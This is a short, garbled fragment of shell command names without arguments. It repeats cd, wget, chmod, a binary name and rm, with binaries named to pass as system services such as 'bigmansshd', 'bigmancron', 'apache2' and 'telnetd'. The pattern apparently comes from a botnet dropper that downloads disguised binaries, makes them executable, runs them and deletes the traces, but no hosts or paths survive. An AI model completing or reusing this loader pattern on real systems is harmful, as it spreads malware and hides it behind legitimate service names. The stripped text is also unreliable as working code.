cd
cd
cd
cd
cd
wget
chmod
bigmanntpd
rm
cd
cd
cd
cd
cd
wget
chmod
bigmansshd
rm
cd
cd
cd
cd
cd
wget
chmod
bigmanopenssh
rm
cd
cd
cd
cd
cd
wget
chmod
bigmanbash
rm
cd
cd
cd
cd
cd
wget
chmod
bigmantftp
rm
cd
cd
cd
cd
cd
wget
chmod
bigmanwget
rm
cd
cd
cd
cd
cd
wget
chmod
bigmancron
rm
cd
cd
cd
cd
cd
wget
chmod
bigmanftp
rm
cd
cd
cd
cd
cd
wget
chmod
bigmanpftp
rm
cd
cd
cd
cd
cd
wget
chmod
bigmansh
rm
cd
cd
cd
cd
cd
wget
chmod
 
rm
cd
cd
cd
cd
cd
wget
chmod
apache2
rm
cd
cd
cd
cd
cd
wget
chmod
telnetd
rm
